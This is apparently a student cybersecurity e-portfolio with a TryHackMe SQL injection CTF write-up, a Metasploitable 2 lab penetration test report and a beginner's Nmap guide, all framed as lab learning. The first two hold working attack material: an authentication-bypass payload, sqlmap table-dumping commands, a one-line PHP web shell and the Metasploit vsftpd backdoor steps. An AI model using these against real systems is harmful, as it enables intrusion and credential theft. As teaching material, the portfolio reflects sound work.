Artifact 7 — CTF Writeup: Web Exploitation Challenge
Platform: TryHackMe Challenge Type: Web Exploitation / SQL Injection Difficulty: Medium Date: Summer 2024
Overview
This writeup documents my approach to a web exploitation challenge involving SQL injection and privilege escalation. The challenge required identifying a vulnerability in a login form, exploiting it to access a database, and using retrieved credentials to gain administrative access to the application.
Reconnaissance
I began by navigating to the challenge URL and examining the login page. Using browser developer tools, I inspected the page source and identified that the login form submitted a POST request to /login.php with parameters username and password.
I then ran a basic Nmap scan to identify open ports and services:
nmap -sV -p 80,443,8080 <target_ip>Results showed port 80 open running Apache 2.4.29 on Ubuntu. No other relevant ports were open.
Identifying the Vulnerability
I tested the login form with a basic SQL injection payload:
Username: admin' --
Password: anythingThe application returned a successful login response, confirming that the login form was vulnerable to SQL injection. The -- comment sequence was causing the password check to be ignored entirely.
Exploitation
Using sqlmap to automate further SQL injection testing:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" --dbsThis returned the database names present on the server. I then enumerated the tables in the target database:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb --tablesThe users table was identified. Dumping its contents:
sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb -T users --dumpThis returned a table containing usernames and hashed passwords. The admin hash was cracked using a wordlist attack with John the Ripper, yielding the plaintext password.
Privilege Escalation
Logging in with the admin credentials revealed an administrative panel with file upload functionality. I tested whether the file upload validated file types by uploading a PHP web shell:
php
<?php system($_GET['cmd']); ?>The upload was accepted. Navigating to the uploaded file’s URL and passing a command:
http://<target>/uploads/shell.php?cmd=idReturned: uid=33(www-data). I now had remote code execution on the server.
Flag Retrieval
Using the web shell to navigate the file system, I located the flag file at /home/admin/flag.txt and retrieved it using:
http://<target>/uploads/shell.php?cmd=cat+/home/admin/flag.txtLessons Learned
This challenge reinforced several important principles:
- SQL injection remains a critical vulnerability in web applications and is preventable through parameterized queries
- File upload functionality must validate file type, not just extension
- Defense in depth matters: even after gaining code execution, a properly configured web server would have limited what
www-datacould access - Methodical enumeration — checking each step before moving to the next — is more effective than rushing toward exploitation
Artifact 8 — Penetration Testing Lab Report
Target Environment: Metasploitable 2 (intentionally vulnerable VM) Testing Type: Internal network penetration test (simulated) Date: Summer 2024
Executive Summary
This report documents a penetration test conducted against a Metasploitable 2 virtual machine in a controlled lab environment. The assessment identified multiple critical vulnerabilities that would allow an unauthenticated attacker to gain full administrative control of the target system. All testing was conducted in an isolated lab environment with no impact on production systems.
Risk Rating: Critical
Scope and Methodology
Scope: Single target host — Metasploitable 2 VM (192.168.56.101) Methodology: PTES (Penetration Testing Execution Standard) Phases: Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting
Reconnaissance
Passive reconnaissance confirmed the target IP and that the system was reachable on the local network. No external OSINT was conducted given the lab nature of the target.
Scanning and Enumeration
An Nmap scan revealed the following open ports and services:
nmap -sV -O -p- 192.168.56.101Key findings:
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 2.3.4 |
| 22 | SSH | OpenSSH 4.7p1 |
| 23 | Telnet | Linux telnetd |
| 80 | HTTP | Apache 2.2.8 |
| 3306 | MySQL | 5.0.51a |
| 5900 | VNC | Protocol 3.3 |
The vsftpd 2.3.4 version is known to contain a backdoor vulnerability (CVE-2011-2523).
Exploitation
Vulnerability 1: vsftpd 2.3.4 Backdoor (CVE-2011-2523)
The vsftpd 2.3.4 backdoor is triggered by sending a username containing :) which causes the server to open a shell on port 6200.
Using Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
runResult: Root shell obtained immediately. No credentials required.
Vulnerability 2: Telnet with Default Credentials
Telnet was accessible with the default credentials msfadmin:msfadmin, providing a second avenue for administrative access.
Post-Exploitation
With root access established, the following post-exploitation activities were performed:
- Confirmed root privileges with
idcommand - Retrieved
/etc/passwdand/etc/shadowfor offline password cracking (simulated) - Demonstrated ability to create new user accounts
- Confirmed access to MySQL database with default root credentials (no password)
Findings Summary
| Finding | Severity | CVE |
|---|---|---|
| vsftpd 2.3.4 backdoor | Critical | CVE-2011-2523 |
| Telnet enabled with default credentials | Critical | N/A |
| MySQL accessible with no root password | Critical | N/A |
| SSH running outdated version | High | Multiple |
| VNC accessible without authentication | Critical | N/A |
Recommendations
- Replace vsftpd 2.3.4 immediately with a current, supported version
- Disable Telnet and use SSH exclusively for remote administration
- Set a strong password for the MySQL root account and restrict remote access
- Update all services to current supported versions
- Implement host-based firewall rules to restrict access to sensitive ports
Conclusion
The Metasploitable 2 system is intentionally vulnerable and serves as a valuable learning environment. In a real-world context, the vulnerabilities identified here would represent an unacceptable risk. This assessment demonstrates the value of regular penetration testing: vulnerabilities that are known and documented can be remediated; vulnerabilities that are undiscovered cannot.
Artifact 9 — NEW ARTIFACT: Beginner’s Guide to Nmap for Cybersecurity Students
Type: Original Educational Resource Created for: IDS E-Portfolio Project Date: Fall 2024
Introduction
If you are just beginning your journey in cybersecurity, you will encounter Nmap within your first few weeks. Nmap (Network Mapper) is a free, open-source tool used for network discovery and security auditing. It is one of the most widely used tools in the field — used by penetration testers, SOC analysts, network administrators, and security researchers every day.
This guide is written for students who have never used Nmap before. By the end, you will understand what Nmap does, how to run basic scans, how to interpret the results, and how to use that information in a security context.
What Does Nmap Do?
Nmap sends specially crafted packets to a target system and analyzes the responses. From those responses, it can determine:
- Which hosts are online on a network
- Which ports are open on those hosts
- What services are running on those ports
- What operating system a host is likely running
This information is foundational to both attacking and defending networks. A penetration tester uses Nmap to understand a target before attempting exploitation. A defender uses it to audit their own network and make sure only expected services are exposed.
Installing Nmap
Nmap is pre-installed on Kali Linux. If you are using another system:
Linux (Debian/Ubuntu):
sudo apt-get install nmapWindows: Download the installer from https://nmap.org/download.html
Mac:
brew install nmapYour First Scan: Ping Sweep
A ping sweep tells you which hosts are alive on a network. This is usually the first thing you do when assessing a network.
nmap -sn 192.168.1.0/24The -sn flag means “scan for hosts only, no port scan.” The /24 means you are scanning all 256 addresses in the 192.168.1.x range.
Example output:
Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
Nmap scan report for 192.168.1.105
Host is up (0.0021s latency).This tells you that two hosts are online: the router (1.1) and one other device (1.105).
Port Scanning Basics
Once you know a host is alive, you want to know what ports are open. Open ports mean running services. Running services are potential entry points.
Basic TCP scan:
nmap 192.168.1.105By default, Nmap scans the 1,000 most common ports.
Scan all 65,535 ports:
nmap -p- 192.168.1.105Scan specific ports:
nmap -p 22,80,443,3389 192.168.1.105Service and Version Detection
Knowing a port is open is useful. Knowing what is running on that port is more useful.
nmap -sV 192.168.1.105The -sV flag attempts to determine the service name and version number for each open port.
Example output:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
80/tcp open http Apache httpd 2.4.29
3306/tcp open mysql MySQL 5.7.30This tells you exactly what is running. You can now research whether any of these specific versions have known vulnerabilities.
Operating System Detection
nmap -O 192.168.1.105Nmap will attempt to fingerprint the operating system based on how the target responds to certain probes. This is not always 100% accurate, but it is a useful starting point.
Putting It Together: A Comprehensive Scan
For most learning scenarios, this command gives you a thorough picture:
nmap -sV -O -A 192.168.1.105The -A flag enables aggressive scanning: OS detection, version detection, script scanning, and traceroute. Be aware that aggressive scans generate more network traffic and are more likely to be detected by security tools.
Reading Nmap Output
Every Nmap scan result has a few key fields:
- PORT: The port number and protocol (e.g., 80/tcp)
- STATE: open, closed, or filtered
- Open = something is listening here
- Closed = port is reachable but nothing is listening
- Filtered = a firewall may be blocking the probe
- SERVICE: The name of the expected service for that port
- VERSION: The specific software version (with -sV)
Legal and Ethical Reminder
Nmap is a powerful tool. Only scan systems you own or have explicit written permission to scan. Scanning systems without permission is illegal in most jurisdictions and can result in serious consequences. In a learning context, always use dedicated lab environments like Metasploitable VMs, TryHackMe rooms, or Hack The Box machines.
Next Steps
Once you are comfortable with Nmap, explore:
- Nmap Scripting Engine (NSE): Automates advanced tasks like vulnerability detection
- Zenmap: A graphical interface for Nmap, good for visualizing results
- Wireshark: Packet capture tool that complements Nmap by letting you see the actual traffic
- Metasploit: Use Nmap findings as input for exploitation in lab environments
Conclusion
Nmap is one of the first tools you will learn and one of the last tools you will stop using. Its simplicity is deceptive — behind a few command-line flags is a remarkably powerful capability to understand any network you are authorized to assess. Practice it regularly, document your results carefully, and always work ethically. The foundation you build with Nmap will serve your entire cybersecurity career.